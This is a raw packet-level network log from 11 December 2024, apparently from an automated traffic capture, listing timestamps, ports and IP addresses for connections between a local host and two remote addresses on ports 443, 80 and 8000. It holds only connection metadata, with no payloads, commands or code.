Dec 11, 2024 12:30:19.248985052 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.248994112 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.249155045 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.249155045 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.249162912 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.249241114 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.249250889 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.249377012 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.250072002 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.250081062 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.250274897 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.250274897 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.250282049 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.250442982 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.251205921 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.251216888 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.251444101 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.251449108 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.251506090 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.251624107 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.251702070 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.252090931 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.252099991 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.252259970 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.252259970 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.252259970 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.252270937 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.252355099 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.252355099 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.252451897 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.252841949 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.252851009 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.252966881 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.253010988 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.253010988 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.253015995 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.253060102 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.253060102 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.253161907 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.253931046 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.253940105 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.254070044 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.254070044 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.254076004 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.254117012 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.254168034 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.254215956 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.254215956 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.254746914 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.254755974 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.254914045 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.254914045 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.255084038 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.255093098 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.255678892 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.255690098 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.255826950 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.255826950 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.255836010 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.255908012 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.255950928 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.255950928 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.255970955 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.256947994 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.256957054 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.257477999 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.257477999 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.257483959 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.257590055 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.257756948 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.257764101 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.258023024 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.258023024 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.258028984 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.258914948 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.258924961 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.259100914 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.259102106 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.259107113 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.259146929 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.259198904 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.259700060 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.259706974 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.259843111 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.259843111 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.259849072 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.259887934 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.259985924 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.260689020 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.260695934 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.260818005 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.260865927 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.260865927 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.260915041 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.260917902 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.261012077 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.261435032 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.261445045 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.261555910 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.261560917 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.261604071 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.261604071 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.261702061 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.261702061 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.261750937 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.262736082 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.262744904 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.262968063 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.262968063 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.262976885 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.262984037 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.263417006 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.263428926 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.263592005 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.263592005 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.263600111 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.263609886 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.263716936 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.264319897 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.264328003 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.264552116 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.264552116 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.264559031 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.265467882 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.265479088 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.265615940 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.265615940 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.265621901 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.265685081 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.265737057 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.265737057 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.265784979 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.266347885 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.266356945 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.266549110 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.266549110 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.266554117 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.266668081 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.267244101 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.267254114 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.267524004 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.267529011 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.267601967 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.267601967 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.267699003 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.267770052 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.268274069 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.268281937 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.268446922 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.268446922 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.268452883 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.268493891 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.268594980 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.269397974 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.269407034 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.269540071 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.269540071 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.269545078 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.269684076 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.269684076 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.270230055 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.270237923 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.270436049 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.270526886 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.270526886 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.270658970 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.270658970 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.270662069 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.270914078 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.270958900 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:19.271085978 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.271132946 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.271256924 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:19.271264076 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:25.794764042 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:26.014188051 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:26.014574051 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:26.014689922 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:26.291558027 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:26.767307997 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:26.767838001 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:27.041599035 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:30.024185896 CET	49764	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:30.238611937 CET	8000	49764	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:30.238843918 CET	49764	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:30.239000082 CET	49764	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:30.508631945 CET	8000	49764	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:31.009083986 CET	8000	49764	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:31.009373903 CET	49764	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:31.009845972 CET	49765	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:31.223803043 CET	8000	49764	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:31.223943949 CET	49764	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:31.225471020 CET	8000	49765	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:31.225625038 CET	49765	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:31.225790977 CET	49765	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:31.225841999 CET	49765	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:31.225841999 CET	49765	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:31.441752911 CET	8000	49765	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:31.441901922 CET	8000	49765	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:31.985872984 CET	8000	49765	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:31.986121893 CET	49765	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:32.201909065 CET	8000	49765	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:32.202857018 CET	49765	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:37.131277084 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:37.407602072 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:37.647084951 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:37.923455000 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:38.162276983 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:38.439146042 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:38.677826881 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:38.939220905 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:39.193337917 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:39.471767902 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:39.709084034 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:39.993510008 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:40.224371910 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:40.494302988 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:56.408308983 CET	49760	80	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:56.522378922 CET	80	49760	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:56.522516012 CET	49760	80	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:56.767649889 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:57.047574043 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:57.191771030 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:30:57.236248016 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:57.236356020 CET	49763	8000	192.168.11.20	23.88.71.29
Dec 11, 2024 12:30:57.515474081 CET	8000	49763	23.88.71.29	192.168.11.20
Dec 11, 2024 12:31:06.831553936 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:06.831634045 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:06.831861973 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:06.831953049 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:06.831989050 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:07.069308996 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:07.069835901 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:07.069849968 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:07.071259022 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:07.071268082 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:07.913765907 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:07.913808107 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:07.913903952 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:07.914015055 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:07.914031982 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:07.914151907 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:07.914165974 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:07.968298912 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:07.968313932 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.015119076 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.143155098 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.143552065 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.143692970 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.143703938 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.143862009 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.143884897 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.143996000 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.144006014 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.144134045 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.144138098 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.144314051 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.144520044 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.186918974 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.373886108 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.374150038 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.374386072 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.374413967 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.374429941 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.374823093 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.374833107 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.374840021 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.375047922 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.375200033 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.375571966 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.375643969 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.375679970 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.375756025 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.375786066 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.375922918 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.376338005 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.376523972 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.421354055 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.605304956 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.605573893 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.605597019 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.605763912 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.605775118 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.605956078 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.606091976 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.606133938 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.606214046 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.606257915 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.606266022 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.606400967 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.606585026 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.606627941 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.606735945 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.606743097 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.606908083 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.607415915 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.607462883 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.607597113 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.607604980 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.607701063 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.655628920 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.837546110 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.837568045 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.837687016 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.837749958 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.837872028 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.837889910 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.838110924 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.838582039 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.838771105 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.839344025 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.839569092 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.839596987 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.839622974 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.839792967 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.840118885 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.840343952 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:08.840852022 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:08.841064930 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.067759991 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.067974091 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.068171024 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.068367004 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.068727970 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.068876028 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.069390059 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.069467068 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.069713116 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.069713116 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.069747925 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.070261002 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.070426941 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.070461988 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.070633888 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.071034908 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.071266890 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.071300030 CET	443	49766	104.21.1.51	192.168.11.20
Dec 11, 2024 12:31:09.071579933 CET	49766	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:31:09.071822882 CET	443	49766	104.21.1.51	192.168.11.20
